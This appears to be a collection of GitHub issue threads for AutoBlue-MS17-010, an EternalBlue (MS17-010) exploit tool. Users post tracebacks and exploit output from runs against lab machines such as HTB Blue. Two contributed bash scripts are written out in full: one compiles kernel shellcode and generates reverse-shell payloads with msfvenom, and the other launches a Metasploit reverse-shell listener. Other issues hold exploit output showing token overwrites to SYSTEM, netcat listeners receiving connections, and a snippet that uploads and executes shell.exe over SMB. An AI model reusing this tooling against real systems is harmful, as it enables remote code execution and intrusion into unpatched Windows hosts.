Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")

I am running this against Blue on HTB. I keep getting the following error. I am able to ping the host. I have tried restarting the machine multiple times. I am on kali 2021.3-vmware-amd64.

 python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2205
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 984, in non_polling_read
    received = self._sock.recv(bytes_left)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 563, in <module>
    exploit(TARGET, sc, numGroomConn)
  File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 544, in exploit
    conn.disconnect_tree(tid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2886, in disconnect_tree
    self.recvSMB()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2592, in recvSMB
    r = self._sess.recv_packet(self.__timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 915, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 1002, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 986, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.

I'm sorry I this post is not appropriate as an issue. I can find any sources how to use this tool and generate bindshell instead of reverse shell.

thanks for your click

attack ：kali 2021
be attacked ： windows server 2012 r2

when i compile
python eternalblue_exploit8.py (windows server 2012 r2 's ip) reverse_shell.bin 500
Traceback (most recent call last):
File "/home/kali/desktop/eternalblue_exploit8.py", line 542, in
fp = open(sys.argv[2], 'rb')
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin'

how to solve it？

I use a translator and my english is poor , please forgive me if there are some errors

Any thoughts on why by running the python zzz_exploit.py x.x.x.x becomes like this ?

[] Target OS: Windows 5.1
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x8171e930
SESSION: 0xe11493f0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe1d8c030
Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!
RestrictedSids: 0xe1d60c30
RestrictedSidCount: 0x1f4
userAndGroupCount: 0x4c
userAndGroupsAddr: 0xe1d8c0b8
Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1d8c0b8
[] overwriting token UserAndGroups
[] have fun with the system smb session!
[-] got exception
CRITICAL:root:SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Done

am learning to exploit without metasploit. I came across autoblue when attempting to do so in HTB-blue.

When I do python eternal_checker.py i get errors

Line 427 in mysmb.py:

except Exception as e:

Line 567 in mysmb.py

except Exception, e:

I am stuck at how to best use it, py2 or py3. i tried using py2 and

1. eternal_checker.py ran but it didn't list out named pipes
2. didn't get active session in msf5 after python eternalblue_exploit7.py [IP:XX:XX:XX] shellcode/sc_all.bin

Help please

HTB Blue box https://app.hackthebox.eu/machines/Blue

Computer        : HARIS-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

I need to run use auxiliary/scanner/smb/pipe_auditor before use multi_hadnler.
Also, it might be the reason why non-meterpreter shells not working. Cause there is not pipe set.

After doin every steps perfectly, i come up with this error "No route to host". What is the solution for this??

My Kali Release: 2021.1

when I run the command, I got the error message below:

┌──(kali㉿kali)-[~/blue]
└─$ python3 ./eternalblue_exploit10.py 10.10.10.40 ./shellcode/sc_all.bin
Traceback (most recent call last):
File "/home/kali/blue/./eternalblue_exploit10.py", line 74, in
ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260 # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to byt

I have run the command line below before running it.

┌──(kali㉿kali)-[~/blue]
└─$ pip install -r requirements.txt 1 ⨯
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.23-py3.9.egg (from -r requirements.txt (line 1)) (0.9.23)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.15.0)

I thought it is related to python version issue, but don't know how to fix it. As you mentioned it support Python3, would you please have a look? I am new to python :(

Hi
I have tested it on vulnerable Windows 7 and Windows 2008 none of them worked:

SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

no shell back in msf

Hi,

I'm having some issues with this code.
I tried using it and it does connect back to my attacking box however there is no shell (cmd.exe)
I was expecting something like this:

C:\Windows\system32>

I tried it against several machines, mostly Windows 7 & Server 2008 which I knew to be vulnerable.
I even tried inputting a different numGroomConn number but with no visible results.
Any thoughts?

python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_OBJECT_NAME_NOT_FOUND

python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49179.

python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_ACCESS_DENIED

python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 49218

python eternalblue_checker.py 10.x.x.x
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

nc -nlvp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49157.

python eternalblue_checker.py xxx.xxx.xxx.xxx Target OS: Traceback (most recent call last): File "eternalblue_checker.py", line 42, in <module> conn.login(USERNAME, PASSWORD) File "/root/AutoBlue-MS17-010/mysmb.py", line 152, in login smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback) TypeError: login() takes at most 6 arguments (7 given)

I am trying to use the exploit on my Win7 PC. I dont know how to setup. Which version of python should i use? Thanks

./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")

Got this error, tried on many different ports still same issue.
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444)

I have no issues using Metasploit (ms17_010_eternalblue) alone to perform the same type of attack. This works.

I've confirmed the target is vulnerable (blue - HTB).

I've created the shellcode without errors.

I've started the listener without errors.

I get the following error when attempting the eternalblue exploit.

root@host/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 12
shellcode size: 2203
numGroomConn: 12
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Any suggestions?

From kali, I am trying to use the eternalblue_exploit10.py, I tried on several W10 machines (all not patched according to eternal_checker.py), and after I run the command the W10 VM crashes.

Target machine Microsoft Windows Version 10.0 (Build 10240)

Here's the ouput of the command in my Kali VM:

`python3 eternalblue_exploit10.py 192.168.202.137 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 10 Home 10240
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 599, in
exploit(TARGET, sc, numGroomConn)
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 570, in exploit
nxconn.disconnect_tree(tid)
File "/usr/lib/python3/dist-package.py", line 2886, in disconnect_tree
self.recvSMB()
File "/usr/lib/python3/dist-package.py", line 2592, in recvSMB
r = self.sess.recv_packet(self.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 915, in recv_packet
data = self.__read(timeout)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 1002, in __read
data = self.read_function(4, time
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 986, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETB with the remote host timed out.
`

Script Enhancements for Improved Portability and Readability 🔧

I made the following changes to improve portability, readability, and organization:

1. Replaced Double Square Brackets with Single Square Brackets:

   • Replaced [[ ... ]] with [ ... ] to ensure compatibility with various shell interpreters.

2. Simplified Nested If Statements:

   • Simplified nested if statements for better readability and clarity.

3. Used -p Option with read Command:

   • Utilized the -p option with the read command to display a prompt message directly on the same line. 💻

4. Consolidated Common Code:

   • Consolidated common code blocks to avoid repetition and improve maintainability.

#!/bin/bash
cat << "EOF"
  __
  /,-
  ||)
  \\_, )
   `--'
EOF
echo Eternal Blue Metasploit Listener
echo
echo LHOST for reverse connection:
read ip
echo LPORT for x64 reverse connection:
read portOne
echo LPORT for x86 reverse connection:
read portTwo
echo Enter 0 for meterpreter shell or 1 for regular cmd shell:
read cmd

# Changes made for better portability and clarity
if [ "$cmd" -eq 0 ]; then
    read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
    if [ "$staged" -eq 0 ]; then
        echo "Starting listener (staged)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    elif [ "$staged" -eq 1 ]; then
        echo "Starting listener (stageless)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/meterpreter_reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    fi
elif [ "$cmd" -eq 1 ]; then
    read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
    if [ "$staged" -eq 0 ]; then
        echo "Starting listener (staged)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/shell/reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    elif [ "$staged" -eq 1 ]; then
        echo "Starting listener (stageless)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/shell_reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    fi
else
    echo "Invalid option...exiting..."
fi

eython eternalblue_checker.py 96.126..
[] exec: python eternalblue_checker.py 96.126..*

Traceback (most recent call last):
File "eternalblue_checker.py", line 42, in
conn.login(USERNAME, PASSWORD)
File "/root/autoblue/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3340, in login
self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True)
File "/root/autoblue/mysmb.py", line 160, in login_extended
Target OS:
smb.SMB.login_extended(self, user, password, domain, lmhash, nthash, use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3250, in login_extended
type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash, use_ntlmv2 = use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 618, in getNTLMSSPType3
ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 )
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 36, in computeResponse
lmhash, nthash, use_ntlmv2=use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 899, in computeResponseNTLMv2
av_pairs = AV_PAIRS(serverName)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 206, in init
self.fromString(data)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 229, in fromString
fType = struct.unpack('<H',tInfo[:struct.calcsize('<H')]

Help!!!!!!

python eternal_checker.py 192.168.0.102
Traceback (most recent call last):
File "eternal_checker.py", line 1, in
from mysmb import MYSMB
File "/home/kali/soft/AutoBlue-MS17-010/mysmb.py", line 3, in
from impacket import smb, smbconnection
ImportError: No module named impacket

pls help me. I had run: pip install impacket , but not working

root@kali:/AutoBlue-MS17-010# python eternal_checker.py 192.168.0.101
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/AutoBlue-MS17-010/mysmb.py", line 122, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2437, in init
self.neg_session()
File "/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2657, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2521, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 997, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
raise NetBIOSError('Error occurs while reading from remote', ERRCLASS_OS, ex[0])
impacket.nmb.NetBIOSError: Error occurs while reading from remote(104)

After doin every steps perfectly, i come up with this error "No route to host". What is the solution for this??

This is whats spws up!!

Hello,

I am having an issue with the Relevant CTF (https://tryhackme.com/room/relevant) using AutoBlue. I see some walkthroughs using it successfully - so the command should work.

As requested, I have filed this as a new issue, as this indeed does occur in latest impacket, latest Python, in a clean Miniconda docker environment (as well as on my host, Kali Linux 2021.1).

The following steps will reproduce this issue:

docker run -i -t continuumio/miniconda3 /bin/bash
conda create -n py397 python=3.9.7
conda activate py397
pip install git+https://github.com/SecureAuthCorp/impacket
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
python3 zzz_exploit.py 'RELEVANT/Bill:[email protected]'

Yielding the following results:

[*] Target OS: Windows Server 2016 Standard Evaluation 14393
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 1112, in <module>
    main()
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 469, in exploit_matched_pairs
    info.update(leak_frag_size(conn, tid, fid))
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 313, in leak_frag_size
    req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
  File "/AutoBlue-MS17-010/mysmb.py", line 375, in create_nt_trans_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/AutoBlue-MS17-010/mysmb.py", line 83, in _put_trans_data
    transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes

Thank you for your time.

I would like to enable this in the file instead of the shell
smbConn = conn.get_smbconnection()
smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
service_exec(conn, r'c:\test.exe')

Is this possible because I am testing with a WinXP host and scripts do not work against that machine.

Changes for Improved Portability and Compatibility ⚙️

Several modifications have been implemented to enhance portability and resolve compatibility issues associated with the use of double brackets [[ ... ]].

Main Differences:

• Compatibility with Different Shell Interpreters: Replaced double brackets [[ ... ]] with single brackets [ ... ] to ensure compatibility with various shell interpreters.

• Code Simplification: Streamlined certain sections of the code to enhance readability and organization.

• Usage of -p with the read Command: Employed the -p option with the read command to display a prompt message directly on the same line. 💻

#!/bin/bash
set -e
cat << "EOF"
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
EOF
echo Eternal Blue Windows Shellcode Compiler
echo
echo Let\'s compile them windoos shellcodezzz
echo
echo Compiling x64 kernel shellcode
nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
echo 'Compiling x86 kernel shellcode'
nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
echo kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? \(Y\/n\)
read genMSF

if [ "$genMSF" = "y" ] || [ "$genMSF" = "Y" ]; then
    read -p "LHOST for reverse connection: " ip
    read -p "LPORT you want x64 to listen on: " portOne
    read -p "LPORT you want x86 to listen on: " portTwo

    read -p "Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell: " cmd

    if [ "$cmd" -eq 0 ]; then
        read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
        if [ "$staged" -eq 0 ]; then
            echo "Generating x64 meterpreter shell (staged)..."
            msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        elif [ "$staged" -eq 1 ]; then
            echo "Generating x64 meterpreter shell (stageless)..."
            msfvenom -p windows/x64/meterpreter_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        else
            echo "Invalid option...exiting..."
            exit 1
        fi
    elif [ "$cmd" -eq 1 ]; then
        read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
        if [ "$staged" -eq 0 ]; then
            echo "Generating x64 cmd shell (staged)..."
            msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        elif [ "$staged" -eq 1 ]; then
            echo "Generating x64 cmd shell (stageless)..."
            msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        else
            echo "Invalid option...exiting..."
            exit 1
        fi
    else
        echo "Invalid option...exiting..."
        exit 1
    fi

    echo "MERGING SHELLCODE WOOOO!!!"
    cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
    cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
    python3 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
else
    echo "Okay cool, make sure you merge your own shellcode properly :)"
fi

echo "DONE"
exit 0

    /home/w/Do/H/N/AutoBlue-MS17-010  on   master !8 ?1    ✔ ▓▒░ python eternal_checker.py 10.10.10.178
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 122, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2427, in init
self.neg_session()
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2642, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2506, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 996, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer

Metasploit uses the following list of named pipes:

netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

Would it make sense to add support for all of these named pipes?

The reason I ask is because I received the following output when running eternalblue_checker.py:

Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

Hello, I have an issue with module name pyasn1.type.univ when running python2 and module name impacket when running python3.

I'm running eternalblue_exploit7.py file and I don't know why it's always showing that error, and I am already stuck on how to fix the issues. My OS is Kali Linux. Can you help me solve this issue?

$ python eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin                                        1 ⨯
Traceback (most recent call last):
  File "eternalblue_exploit10.py", line 2, in <module>
    from impacket import smb, ntlm
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 49, in <module>
    from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ

$ python3 eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin                                       1 ⨯
Traceback (most recent call last):
  File "/home/avv-kali/Documents/Offensive Security/Tools/Exploitation/AutoBlue-MS17-010/eternalblue_exploit10.py", line 2, in <module>
    from impacket import smb, ntlm
ModuleNotFoundError: No module named 'impacket'

Hi,

I'm doing my pentesting via a locally installed Pi that offers an OpenVPN connection for me. The Pi is in the LAN of the client and I use that in combination with a Kali install that connects via VPN.

I don't think I can compile the shellcode on the Pi, so I ded that on Kali. I cannot start the listener on Kali however,, because it has no IP on the client's LAN. It has a TUN interface in another range.

Can the code be changed so I can use a listener on another host?

Cheers,

BC

I'd like to know how to generate bind shell payload, please.

If I run shell_prep.sh I get a compilation error

`
./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
eternalblue_kshellcode_x64.asm: fatal: unable to open output file sc_x64_kernel.bin'

but if I run shell_prep.sh with sudo permissions it does not give me problems

`
sudo ./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
n
Okay cool, make sure you merge your own shellcode properly :)
DONE
`

hello,what's wrong with this,my python is 3.7.2,and my impacket is the latest

(py3) C:\Users\admin\Downloads\AutoBlue-MS17-010-master>python zzz_exploit.py test:[email protected]
[*] Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
  File "zzz_exploit.py", line 1112, in <module>
    main()
  File "zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
